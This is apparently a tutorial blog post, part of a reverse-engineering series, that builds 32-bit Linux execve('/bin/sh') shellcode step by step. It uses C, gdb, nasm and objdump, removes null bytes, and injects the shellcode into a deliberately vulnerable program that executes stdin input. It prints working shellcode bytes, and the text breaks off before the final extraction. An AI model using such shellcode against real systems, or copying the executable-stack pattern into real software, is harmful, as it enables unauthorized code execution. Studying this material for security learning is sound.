Exploitation using Code Injection - Part2
Hey fellow pwners!
In the previous article, we spoke about System Calls, how to extract machinecode from the assembly code we write and how null bytes in the machine code will reduce their reliability when they are injected.
In this article, we will go a step further and see how dangerous code injection may be. We will discuss and understand what Shellcode is and why it is called so.
Create a directory named post_10 inside the rev_eng_series directory.
A quick recap!
We used the following progran to do all the experiments in the previous article.
~/rev_eng_series/post_9$ cat code2.c
#include<stdio.h>
#include<string.h>
#include<unistd.h>
int main() {
char buffer[100];
read(0, buffer, sizeof(buffer));
void (*executeme)();
executeme = buffer;
executeme();
return 0;
}
And we compiled it in the following manner:
~/rev_eng_series/post_10$ gcc code2.c -o code2 -zexecstack
We wrote the assembly code first, assembled it, linked it and made sure it is functioning properly and then extracted the machine code from it using objdump.
If you have not read the previous article, I would advise you to read it before you go through with this article because it has a lot of basics and ground covered for this article without which you may not understand some things which are done in this article.
The exit() System Call
Let us quickly recap how we extracted the machine code of exit(1) System Call.
Step0: Write the assembly program:
~/rev_eng_series/post_10$ cat exit.asm
section .text
global _start
_start:
mov rax, 0x01
mov rbx, 0x01
int 0x80
Step1: Assemble and Link it and make sure you get an executable. Also make sure the executable runs properly - does what it is programmed to do.
~/rev_eng_series/post_10$ nasm exit.asm -f elf64
~/rev_eng_series/post_10$ ld exit.o -o exit
~/rev_eng_series/post_10$ ./exit
~/rev_eng_series/post_10$
Step2: Extract machine code from the executable using objdump.
~/rev_eng_series/post_10$ objdump -Mintel -d exit
exit: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: b8 01 00 00 00 mov eax,0x1
400085: bb 01 00 00 00 mov ebx,0x1
40008a: cd 80 int 0x80
Here, you get the machine code but there are NULL (\x00) in it. So, write assembly code which generates machine code with zero NULL bytes.
Step3: Writing assembly code which generates machine code with zero NULL bytes. (All the steps)
~/rev_eng_series/post_10$ cat exit_no_null.asm
section .text
global _start
_start:
xor rax, rax
mov al, 0x01
xor rbx, rbx
mov bl, 0x01
int 0x80
~/rev_eng_series/post_10$ nasm exit_no_null.asm -f elf64
~/rev_eng_series/post_10$ ld exit_no_null.o -o exit_no_null
~/rev_eng_series/post_10$ ./exit_no_null
~/rev_eng_series/post_10$ objdump -Mintel -d exit_no_null
exit_no_null: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: b0 01 mov al,0x1
400085: 48 31 db xor rbx,rbx
400088: b3 01 mov bl,0x1
40008a: cd 80 int 0x80
~/rev_eng_series/post_10$
You extract the machine code and give it as an input to code2.
~/rev_eng_series/post_10$ python -c "print '\x48\x31\xc0\xb0\x01\x48\x31\xdb\xb3\x01\xcd\x80'" | ./code2
So, that was a quick recap.
To make sure our machine code works fine, we will follow the following steps:
- Write the C program. Understand the System Call, it’s arguments.
- Disassemble the program, look at how arguments are passed, how the System Call is executed - Helps in Step3.
- Write the Assembly program.
- Assemble it and Link it to get an executable.
- Run the executable - Important Step - 01
- Extract the machinecode from the executable and inject into code2 - Important Step - 02
- Write assembly program which will generate a no-null-byte machine code.
- Assemble it and Link it to get the executable.
- Run the executable - Important Step - 03
- Extract machine code from the executable and inject into code2 - Important Step - 04
There are 4 important steps. They are important because we will know if the assembly program we wrote / machine code we extracted are working correctly. If the program segfaults, then we can debug and get things right.
Level up!
We understood the exit(1) System Call and extracted machine code from it. We did try out code injection but it was not fun enough. It was not evil enough :P .
We have to level up and do something amazing.
Whenever you think of attacking a system, why do you even attack it in the first place? I do it because I can hack it and get control of that system. I should be able to do whatever I want with it. How can do whatever we want in such a system? We can do whatever we want by getting a shell. If you have a shell, you can execute whatever command you want depending on your user privileges.
You somehow exploit a system and get a shell with a standard user privileges, then you can do some stuff. You will have some control over the system but that is not all.
If you exploit a system and get a shell with root privileges, then you are the god!!. If you are root, you then definitely have complete control over the system.
You might be aware of the obsession with getting a shell with root privileges. This is the reason. You hack into a system and you have root privileges, then you are the god.
So, from here we will be discussing on How to get a shell? using Code Injection Exploit method.
execve system call!
You might have heard of this word Shellcode before. I specifically didn’t want to use it till we come to this part of the article. Shellcode is machine code which when executed gives a shell.
We saw machine code which will terminate a program peacefully. Now, we will look at machine code which will give you a shell, where you can execute commands and depending on the user privileges you get, you can do whatever you want. So, go Shellcode!!
Before getting into shellcode, there are some basics to be understood.
How is a new program run?
If you want to run your a.out program, you just do ./a.out on your commandline and don’t really care about the rest of the work done to execute a.out . Here, you have to note that your CommandLine Shell(by default bash) will request the Operating System to run your a.out program. Let us see how it does that.
Let us take the exit.asm example.
~/rev_eng_series/post_10$ cat exit.asm
section .text
global _start
_start:
mov rax, 0x01
mov rbx, 0x01
int 0x80
~/rev_eng_series/post_10$ nasm exit.asm -f elf64
~/rev_eng_series/post_10$ ld exit.o -o exit
-
It has only the exit system call. Our focus is on how the commandline requests the Operating System to execute the executable.
-
In the previous article, we used a wonderful tool called strace. Let us use strace and see if we find out something.
~/rev_eng_series/post_10$ strace ./exit execve("./exit", ["./exit"], [/* 84 vars */]) = 0 write(0, NULL, 0 <unfinished ...> +++ exited with 1 +++
-
Observe this. It says exited with 1. This is perfect. But what is that first thing there? It says execve and there are 3 arguments out there. It returns a value of 0.
-
Let us see what execve is. Let us look at it’s man page.
NAME execve - execute program SYNOPSIS #include <unistd.h> int execve(const char *filename, char *const argv[], char *const envp[]); DESCRIPTION execve() executes the program pointed to by filename. filename must be either a binary executable, or a script starting with a line of the form: #! interpreter [optional-arg]
-
Let us first understand what execve’s arguments are which will help write programs using execve.
-
Argument 0: const char * filename
- This is the path of the program to be run. Suppose you have to run the program named a.out present in the current directory, then filename = ./a.out .
-
Argument 1: char * const argv[]
- argv is the pointer to the array of character pointers where each of the character pointers points to the argument of the program we want to execute.
-
Suppose the program a.out has 3 command-line arguments. Look at this diagram:
argv ---------->---- argv[0] ----> "a.out" ---- argv[1] ----> "Argument1" ---- argv[2] ----> "Argument2" ---- argv[3] ----> "Argument3"
- Argument 2: char * const envp[]
-
argv is a pointer to an array of character pointers where each one of those pointers pointed to an argument of the program to be run.
-
envp is also a pointer to an array of character pointers where each one of these pointers points to one environment variable.
-
Ok. So, what is an environment variable? These are variables which describe the complete environment where the program is going to be executed.
-
Let us use the printenv command to list all the Environment variables:
~/rev_eng_series/post_10$ printenv XDG_VTNR=7 XDG_SESSION_ID=c2 TERM_PROGRAM=vscode rvm_bin_path=/home/adwi/.rvm/bin XDG_GREETER_DATA_DIR=/var/lib/lightdm-data/adwi CLUTTER_IM_MODULE=xim SESSION=ubuntu GEM_HOME=/home/adwi/.rvm/gems/ruby-2.4.1 GPG_AGENT_INFO=/home/adwi/.gnupg/S.gpg-agent:0:1 TERM=xterm-256color VTE_VERSION=4205 XDG_MENU_PREFIX=gnome- SHELL=/bin/bash IRBRC=/home/adwi/.rvm/rubies/ruby-2.4.1/.irbrc QT_LINUX_ACCESSIBILITY_ALWAYS_ON=1 TERM_PROGRAM_VERSION=1.28.2 SEED_ENV=1234 WINDOWID=71303178 OLDPWD=/home/adwi/rev_eng_series/post_9 UPSTART_SESSION=unix:abstract=/com/ubuntu/upstart-session/1000/3301 GNOME_KEYRING_CONTROL= MY_RUBY_HOME=/home/adwi/.rvm/rubies/ruby-2.4.1 GTK_MODULES=gail:atk-bridge:unity-gtk-module USER=adwi LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36: QT_ACCESSIBILITY=1 _system_type=Linux UNITY_HAS_3D_SUPPORT=true XDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0 rvm_path=/home/adwi/.rvm XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0 SSH_AUTH_SOCK=/run/user/1000/keyring/ssh DEFAULTS_PATH=/usr/share/gconf/ubuntu.default.path SESSION_MANAGER=local/adwi:@/tmp/.ICE-unix/3564,unix/adwi:/tmp/.ICE-unix/3564 XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/usr/share/upstart/xdg:/etc/xdg UNITY_DEFAULT_PROFILE=unity rvm_prefix=/home/adwi DESKTOP_SESSION=ubuntu PATH=/home/adwi/.cargo/bin:/home/adwi/.cargo/bin:/home/adwi/.rvm/gems/ruby-2.4.1/bin:/home/adwi/.rvm/gems/ruby-2.4.1@global/bin:/home/adwi/.rvm/rubies/ruby-2.4.1/bin:/home/adwi/.cargo/bin:/home/adwi/bin:/home/adwi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/home/adwi/.rvm/bin:/home/adwi/android_studio_bin/:.:/home/adwi/.rvm/bin:/home/adwi/android_studio_bin/:.:/home/adwi/.rvm/bin QT_IM_MODULE=ibus QT_QPA_PLATFORMTHEME=appmenu-qt5 XDG_SESSION_TYPE=x11 PWD=/home/adwi/rev_eng_series/post_10 JOB=unity-settings-daemon XMODIFIERS=@im=ibus GNOME_KEYRING_PID= LANG=en_US.UTF-8 GDM_LANG=en_US MANDATORY_PATH=/usr/share/gconf/ubuntu.mandatory.path _system_arch=x86_64 COMPIZ_CONFIG_PROFILE=ubuntu IM_CONFIG_PHASE=1 _system_version=16.04 GDMSESSION=ubuntu rvm_version=1.29.4 (latest) SESSIONTYPE=gnome-session GTK2_MODULES=overlay-scrollbar SHLVL=3 HOME=/home/adwi XDG_SEAT=seat0 APPLICATION_INSIGHTS_NO_DIAGNOSTIC_CHANNEL=true LANGUAGE=en_IN:en GNOME_DESKTOP_SESSION_ID=this-is-deprecated UPSTART_INSTANCE= UPSTART_EVENTS=xsession started XDG_SESSION_DESKTOP=ubuntu LOGNAME=adwi COMPIZ_BIN_PATH=/usr/bin/ GEM_PATH=/home/adwi/.rvm/gems/ruby-2.4.1:/home/adwi/.rvm/gems/ruby-2.4.1@global DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-BmtjuWr985 XDG_DATA_DIRS=/usr/share/ubuntu:/usr/share/gnome:/usr/local/share:/usr/share:/var/lib/snapd/desktop QT4_IM_MODULE=xim LESSOPEN=| /usr/bin/lesspipe %s INSTANCE= UPSTART_JOB=unity7 XDG_RUNTIME_DIR=/run/user/1000 DISPLAY=:0 XDG_CURRENT_DESKTOP=Unity GTK_IM_MODULE=ibus RUBY_VERSION=ruby-2.4.1 LESSCLOSE=/usr/bin/lesspipe %s %s _system_name=Ubuntu XAUTHORITY=/home/adwi/.Xauthority _=/usr/bin/printenv
-
Look at every single variable. It has some detail about the environment in which the program is being run. Consider the HOME environment variable. It’s value is /home/adwi. So, this tells that the home directory is /home/adwi.
-
Similarly, there are many such important things. Look at the SHELL variable. It is /bin/bash. This tells that the default shell here is /bin/bash.
-
All these variables make up what is known as an environment for the process to run.
-
When a new program is run, all these variables are inherited by the new program. All these variables are passed to the new program using the envp pointer. This way, the new program is aware of it’s environment.
Having known this much about execve, let us write a very simple program. Check this out:
~/rev_eng_series/post_10$ cat getshell.c
#include<stdio.h>
#include<unistd.h>
int main() {
//The filename / name of the new program we want to execute.
char *filename = "/bin/sh";
//There is only 1 argument here - the program name itself.
char **argv;
argv[0] = "/bin/sh";
argv[1] = NULL;
//Let us not inherit environment variables.
char **envp;
envp = NULL;
if(execve(filename, argv, envp)) {
fprintf(stderr, "Error in executing execve system call\n");
_exit(-1);
}
return 0;
}
-
The program is simple. We are executing the well-known /bin/sh program. This is the standard program of shell. If this gets executed, we will get a shell. Let us compile and run it.
~/rev_eng_series/post_10$ ./getshell $ $ $ ls a.out code1.c code2 code2.c dummy dummy.c execve exit exit.asm exit.o exit_no_null exit_no_null.asm exit_no_null.o getshell getshell.c peda-session-execve.txt post.md $ ls -l total 124 -rwxrwxr-x 1 adwi adwi 8608 Oct 30 02:27 a.out -rw-rw-r-- 1 adwi adwi 196 Oct 30 02:27 code1.c -rwxrwxr-x 1 adwi adwi 8664 Oct 29 21:50 code2 -rw-rw-r-- 1 adwi adwi 197 Oct 29 21:50 code2.c -rwxrwxr-x 1 adwi adwi 8552 Oct 29 23:16 dummy -rw-rw-r-- 1 adwi adwi 15 Oct 29 23:16 dummy.c -rwxrwxr-x 1 adwi adwi 8752 Oct 30 03:08 execve -rwxrwxr-x 1 adwi adwi 704 Oct 29 23:19 exit -rw-rw-r-- 1 adwi adwi 78 Oct 29 21:55 exit.asm -rw-rw-r-- 1 adwi adwi 576 Oct 29 23:19 exit.o -rwxrwxr-x 1 adwi adwi 712 Oct 29 22:00 exit_no_null -rw-rw-r-- 1 adwi adwi 104 Oct 29 22:00 exit_no_null.asm -rw-rw-r-- 1 adwi adwi 576 Oct 29 22:00 exit_no_null.o -rwxrwxr-x 1 adwi adwi 8752 Oct 30 03:08 getshell -rw-rw-r-- 1 adwi adwi 465 Oct 30 03:06 getshell.c -rw-rw-r-- 1 adwi adwi 12 Oct 30 03:04 peda-session-execve.txt -rw-rw-r-- 1 adwi adwi 16391 Oct 30 03:08 post.md $ $
-
Play around with this shell. You will soon findout that this shell we got is not as cool as the normal colorful shell we are using. That is because most of the environment variables are not inherited. Some are inherited by default.
-
But it is giving us what we want - a commaneline to execute commands, sneek into files.
Now, we know how execve works. Write a few simple programs which run other programs using execve and make sure you clearly understand this System Call.
From here onwards, let us work on 32-bit executables. We will write shellcode for 32-bit programs.
Shellcode
That was an important detour we took to understand execve system call.
Coming back to writing shellcode, these are the steps we will follow to get working shellcode:
- Write the C program. Understand the System Call, it’s arguments.
- Disassemble the program, look at how arguments are passed, how the System Call is executed - Helps in Step3.
- Write the Assembly program.
- Assemble it and Link it to get an executable.
- Run the executable - Important Step - 01
- Extract the machinecode from the executable and inject into code2 - Important Step - 02
- Write assembly program which will generate a no-null-byte machine code.
- Assemble it and Link it to get the executable.
- Run the executable - Important Step - 03
- Extract machine code from the executable and inject into code2 - Important Step - 04
Step1: Write the C program. Understand the System Call, it’s arguments
The program we wrote to get a shell using execve was good, but that used too much of memory. Our machinecode(from now on shellcode) should always be minimalistic because we never know the memory constraints in the target system. It has to use least amount resources.
Let us rewrite the program with least number of variables, no error handling.
~/rev_eng_series/post_10$ cat getshell2.c
int main() {
//There is only 1 argument here - the program name itself.
char **argv;
argv[0] = "/bin/sh";
argv[1] = 0;
char **envp = 0;
execve(argv[0], argv, envp);
return 0;
}
-
Let us compile it in this manner:
~/rev_eng_series/post_10$ gcc getshell2.c -o getshell2 -m32
-
We get a 32-bit executable.
-
Run it and confirm that you get a shell.
-
Step 1 done!
Step2: Disassemble the program, look at how arguments are passed, how the System Call is executed
Why should we do this?
We have to do this because we will know how exactly the System Call is executed. We can look at it and write a similar assembly program. It is to get an idea to write the assembly program. I personally feel this is a very important step because we will be reading code generated by the compiler - error-free code. So, if we write our assembly program similar to this, we can be mostly sure that assembly code will also work properly. If it works, then the shellcode extracted from that assembly code will work. I hope you are getting my point.
-
We will quickly open gdb and look into getshell2’s disassembly.
~/rev_eng_series/post_10$ gdb -q getshell2 Reading symbols from getshell2...(no debugging symbols found)...done. gdb-peda$ disass main Dump of assembler code for function main: 0x0804840b <+0>: lea ecx,[esp+0x4] 0x0804840f <+4>: and esp,0xfffffff0 0x08048412 <+7>: push DWORD PTR [ecx-0x4] 0x08048415 <+10>: push ebp 0x08048416 <+11>: mov ebp,esp 0x08048418 <+13>: push ecx 0x08048419 <+14>: sub esp,0x14 0x0804841c <+17>: mov eax,DWORD PTR [ebp-0x10] 0x0804841f <+20>: mov DWORD PTR [eax],0x80484e0 0x08048425 <+26>: mov eax,DWORD PTR [ebp-0x10] 0x08048428 <+29>: add eax,0x4 0x0804842b <+32>: mov DWORD PTR [eax],0x0 0x08048431 <+38>: mov DWORD PTR [ebp-0xc],0x0 0x08048438 <+45>: sub esp,0x4 0x0804843b <+48>: push 0x0 0x0804843d <+50>: push 0x0 0x0804843f <+52>: push 0x80484e0 0x08048444 <+57>: call 0x80482f0 <execve@plt> 0x08048449 <+62>: add esp,0x10 0x0804844c <+65>: mov eax,0x0 0x08048451 <+70>: mov ecx,DWORD PTR [ebp-0x4] 0x08048454 <+73>: leave 0x08048455 <+74>: lea esp,[ecx-0x4] 0x08048458 <+77>: ret End of assembler dump. gdb-peda$
-
Let us break at this instruction: 0x08048444 <+57>: call 0x80482f0 execve@plt . Just before the execve function gets executed.
gdb-peda$ b *0x08048444
-
Let’s run
gdb-peda$ run
-
Now, we will be doing an important step. We will be breaking at execve function in this manner:
gdb-peda$ print execve $1 = {<text variable, no debug info>} 0xf7ead7e0 <execve> gdb-peda$ b *0xf7ead7e0
-
The print command is used to find the actual address of the execve function in libc shared library. Let us break at that point.
-
Let us now observe the stack. Let us look at the arguments passed to the execve function.
[------------------------------------stack-------------------------------------] 0000| 0xffffcbc0 --> 0x80484e0 ("/bin/sh") 0004| 0xffffcbc4 --> 0x0 0008| 0xffffcbc8 --> 0x0 0012| 0xffffcbcc --> 0x80484ab (<__libc_csu_init+75>: add edi,0x1) 0016| 0xffffcbd0 --> 0x1 0020| 0xffffcbd4 --> 0xffffcc94 --> 0xffffcec4 ("/home/adwi/rev_eng_series/post_10/getshell2") 0024| 0xffffcbd8 --> 0xffffcc9c --> 0x80484e0 ("/bin/sh") 0028| 0xffffcbdc --> 0x0 [------------------------------------------------------------------------------]
-
We know that execve has 3 arguments. The first is the address of string “/bin/sh”. The second is 0 and third is 0. Notice that in our C program, the second argument was not 0. The compiler has made these changes. This is how arguments are pushed onto the stack:
0x0804843b <+48>: push 0x0 0x0804843d <+50>: push 0x0 0x0804843f <+52>: push 0x80484e0 //The address of "/bin/sh" 0x08048444 <+57>: call 0x80482f0 <execve@plt>
-
Let us continue.
-
Let us look at the assembly code of execve function:
gdb-peda$ disass execve Dump of assembler code for function execve: => 0xf7ead7e0 <+0>: push ebx 0xf7ead7e1 <+1>: mov edx,DWORD PTR [esp+0x10] 0xf7ead7e5 <+5>: mov ecx,DWORD PTR [esp+0xc] 0xf7ead7e9 <+9>: mov ebx,DWORD PTR [esp+0x8] 0xf7ead7ed <+13>: mov eax,0xb 0xf7ead7f2 <+18>: call DWORD PTR gs:0x10 0xf7ead7f9 <+25>: pop ebx 0xf7ead7fa <+26>: cmp eax,0xfffff001 0xf7ead7ff <+31>: jae 0xf7e15730 0xf7ead805 <+37>: ret End of assembler dump. gdb-peda$
-
Let us just recall how arguments are accessed by the callee function.This is a 32-bit executable. So, corresponding function call mechanism is used. esp+0x8 is the address of the First Argument. esp+0xc is the address of the Second Argument. esp+0x10 is the address of Third Argument.
-
For a System Call, arguments are passed like this: ebx has the First Argument, ecx has the Second, edx has the Third etc.,
-
Let us see if both the above things tally properly.
ebx = DWORD PTR [esp + 0x8] ------ First Argument - Address of "/bin/sh" ecx = DWORD PTR [esp + 0xc] ------ Second Argument - 0 edx = DWORD PTR [esp + 0x10] ------ Third Argument - 0
-
Yes. everything is good. In instruction mov eax, 0xb, the System Call Number of execve = 0xb or 11 is loaded into eax.
-
Then there is a call to DWORD PTR gs:0x10. Here, the System Call is executed.
-
continue in gdb and make sure a new program is executed. I got this to confirm that a shell is executed.
process 5732 is executing new program: /bin/dash Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x8048444 Cannot insert breakpoint 2. Cannot access memory at address 0xf7ead7e0
-
So, the program /bin/dash is executed. Bingo!
I hope you have understood the assembly code of the C program well because we will be writing Assembly code with keeping this as our foundation.
Step 2 done!
Step3, 4, 5: Write the Assembly program, assemble, link and run it:
These is how the compiler did it:
- Push the 3 arguments onto the stack.
- Call the execve function - which is a wrapper for execve System Call.
Let us try this method and get a shell first. Do not care about null bytes or anything. Just focus on getting the assembly program right.
-
Storing the string /bin/sh in .data section.
section .data shell: db "/bin/sh", 0x00
-
Writing code in .text section.
section .text global _start
_start: push 0 push 0 push shell
call execve
- Look at this. It is complete copy of the compiler output. I didn’t change anything because we know it is correct.
-
This is how label: execve looks like:
execve: push ebp mov edx, dword [esp + 0x10] mov ecx, dword [esp + 0xc] mov ebx, dword [esp + 0x8] mov eax, 0x0b int 0x80
-
This is the complete program:
~/rev_eng_series/post_10$ cat getshell2.asm section .data shell: db "/bin/sh", 0x00 section .text global _start _start: push 0 //3rd Argument push 0 //2nd Argument push shell //1st Argument call execve call exit //In case execve fails execve: push ebp //Store old ebp. mov edx, dword [esp + 0x10] // 3rd Argument: 0 mov ecx, dword [esp + 0xc] // 2nd Argument: 0 mov ebx, dword [esp + 0x8] // 1st Argument: Address of "/bin/sh" mov eax, 0x0b // System Call number loaded into eax int 0x80 // Request Kernel!
-
Let us assemble it, link it and get the executable.
~/rev_eng_series/post_10$ nasm getshell2.asm -f elf32 ~/rev_eng_series/post_10$ ld getshell2.o -o asm_getshell2 -m elf_i386
-
We have asm_getshell2. Let us run it:
~/rev_eng_series/post_10$ ./asm_getshell2 $ $ whoami adwi $ $ who adwi tty7 Nov 1 19:26 (:0) $ $ ls -l total 856 -rwxrwxr-x 1 adwi adwi 8608 Oct 30 02:27 a.out -rwxrwxr-x 1 adwi adwi 700 Nov 2 16:45 asm_getshell2 -rw-rw-r-- 1 adwi adwi 196 Oct 30 02:27 code1.c -rwxrwxr-x 1 adwi adwi 8664 Oct 29 21:50 code2 -rw-rw-r-- 1 adwi adwi 197 Oct 29 21:50 code2.c -rwxrwxr-x 1 adwi adwi 8552 Oct 29 23:16 dummy -rw-rw-r-- 1 adwi adwi 15 Oct 29 23:16 dummy.c -rwxrwxr-x 1 adwi adwi 8752 Oct 30 03:08 execve -rwxrwxr-x 1 adwi adwi 704 Oct 29 23:19 exit -rw-rw-r-- 1 adwi adwi 78 Oct 29 21:55 exit.asm -rw-rw-r-- 1 adwi adwi 576 Oct 29 23:19 exit.o -rwxrwxr-x 1 adwi adwi 712 Oct 29 22:00 exit_no_null -rw-rw-r-- 1 adwi adwi 104 Oct 29 22:00 exit_no_null.asm -rw-rw-r-- 1 adwi adwi 576 Oct 29 22:00 exit_no_null.o -rwxrwxr-x 1 adwi adwi 725236 Nov 2 15:33 getshell -rw-rw-r-- 1 adwi adwi 465 Oct 30 03:06 getshell.c -rwxrwxr-x 1 adwi adwi 700 Nov 2 16:42 getshell2 -rw-rw-r-- 1 adwi adwi 312 Nov 2 16:42 getshell2.asm -rw-rw-r-- 1 adwi adwi 188 Nov 2 15:46 getshell2.c -rw-rw-r-- 1 adwi adwi 688 Nov 2 16:45 getshell2.o -rw-rw-r-- 1 adwi adwi 12 Oct 30 03:04 peda-session-execve.txt -rw-rw-r-- 1 adwi adwi 14 Nov 2 16:35 peda-session-getshell2.txt -rw-rw-r-- 1 adwi adwi 28626 Nov 2 16:45 post.md $
Bingo!! You got it.
- Few thoughts about this program:
-
Amazing! We got the shell. Now, we have to think if we can inject the machine code extracted from this assembly program.
-
Note that this program has a .data section. So, in order for this to work when injected, we should have written the string /bin/sh into the data section of the vulnerable software. So, first we have to inject code which will write the string in .data section and then inject code which will give a shell. This is somehow not fitting our “Be a Minimalist” policy :P
-
Also, we do not need function call jumps to execute execve. We don’t have to copy arguments into registers similar to a function call. Let us cut all that and do whatever is needed.
-
Let us try writing a program without using the .data section. What other memory section can we use? We have the stack for us. We can store the string “/bin/sh” in the stack and get the address. The C program getshell2.c we wrote is our reference.
~/rev_eng_series/post_10$ cat getshell2.c int main() { //There is only 1 argument here - the program name itself. char **argv; argv[0] = "/bin/sh"; argv[1] = 0; char **envp = 0; execve(argv[0], argv, envp); return 0; }
- We will write an assembly program shell32.asm which is almost a copy of the above C program.
-
In this step, we will see how we can write the assembly program.
-
We have a string “/bin/sh” to store in stack. The stack should look something like this after storing the string:
string_address : / b i n / / s h string_address + 8 : 0 0 0 0 0 0 0 0
-
You first push 0 onto the stack. Then store the string. Remember, a string is always NULL-terminated.
-
We now need argv. The pointer which points to the array of pointers. The clear direction is: argv[1] = 0, argv[0] = Address of “/bin/sh”. We can do the following.
mov Reg1, esp ; Top of stack points to "/bin//sh" push 0x00 ; argv[1] = 0x00 push Reg1 ; Pushing address of "/bin//sh" mov Reg2, esp : Top of stack is argv.
-
Open this assembly program. It has x86 assembly code written to get a shell. The following is a comment-less version of the same program:
section .text global _start _start: push 0x00 push 0x68732f2f push 0x6e69622f mov ebx, esp push 0x00 push ebx mov ecx, esp mov edx, 0x00 mov eax, 0xb int 0x80 exit: mov eax, 0x01 mov ebx, 0x00 int 0x80
-
Go through shell32.asm assembly program carefully. I have added comments to each instruction. When you read that assembly program, it is better to keep the C program as reference. You will be able to understand what exactly is being done in shell32.asm.
-
-
Assemble, link and run the program:
-
Read this carefully. Only after you have understood the program completely, you go ahead with this step. It is very important that you understand the program. This will help you write your own shellcode later on.
-
Let us run it.
rev_eng_series/roughwork$ nasm shell32.asm -f elf32 rev_eng_series/roughwork$ ld shell32.o -o shell32 -m elf_i386 rev_eng_series/roughwork$ ./shell32 $ $ whoami adwi $
-
Bingo! You get a shell as expected.
-
So, our assembly program is working.
-
Step6: Extract machinecode and check if it’s working or not.
-
The following is the objdump output of shell32 executable.
$ objdump -Mintel -d shell32 shell32: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: 6a 00 push 0x0 8048062: 68 2f 2f 73 68 push 0x68732f2f 8048067: 68 2f 62 69 6e push 0x6e69622f 804806c: 89 e3 mov ebx,esp 804806e: 6a 00 push 0x0 8048070: 53 push ebx 8048071: 89 e1 mov ecx,esp 8048073: ba 00 00 00 00 mov edx,0x0 8048078: b8 0b 00 00 00 mov eax,0xb 804807d: cd 80 int 0x80 0804807f <exit>: 804807f: b8 01 00 00 00 mov eax,0x1 8048084: bb 00 00 00 00 mov ebx,0x0 8048089: cd 80 int 0x80
-
Extract the machine code and store it in a file exploit.txt. It can be done in the following manner.
$ python -c "print '\x6a\x00\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x00\x53\x89\xe1\xba\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80'" > exploit.txt
-
-
We have the shellcode stored in the file exploit.txt. Let us compile code2.c to get a 32-bit executable so that we can try and test our shellcode in it.
$ gcc code2.c -o code2_32 -m32 -zexecstack code2.c: In function ‘main’: code2.c:11:12: warning: assignment from incompatible pointer type [-Wincompatible-pointer-types] executeme = buffer; $
- Now, we have code2_32 executable which we can use to test our shellcode written for 32-bit Intel systems.
-
Testing our shellcode!
$ cat exploit.txt - | ./code2_32 whoami adwi echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin who adwi tty7 Nov 26 17:51 (:0)
-
Amazing! The shellcode is working perfectly. We got the shell. One thing you should note that is you do not get the $ symbol. But you get a working shell.
-
Again, we wrote this shellcode for x86-Linux systems. This won’t work on x64-Linux systems.
-
Step7, 8, 9, 10: Writing no-NULL Byte Shellcode!
At the end of previous step, we successfully wrote working shellcode. But under certain conditions, it won’t work because there are plenty of NULL-characters in the middle of shellcode.
To make our exploit more reliable, we have to write the assembly program which doesn’t generate machine code with NULL characters. This might take time, but I suggest you do it yourself.
-
The following program will give no-null character machine code.
$ cat shell32_no_null.asm section .text global _start _start: xor eax, eax ; Set eax = 0 push eax push 0x68732f2f push 0x6e69622f mov ebx, esp push eax push ebx mov ecx, esp xor edx, edx ; Set edx = 0 mov al, 0xb ; Set eax = 0xb int 0x80 exit: xor eax, eax inc eax xor ebx, ebx int 0x80
-
Assemble, link and run it:
rev_eng_series/roughwork$ nasm shell32_no_null.asm -f elf32 rev_eng_series/roughwork$ ld shell32_no_null.o -o shell32_no_null -m elf_i386 rev_eng_series/roughwork$ ./shell32_no_null $ $ whoami adwi $
- We got a shell!!
-
Extract shellcode from it. The following is the objdump output.
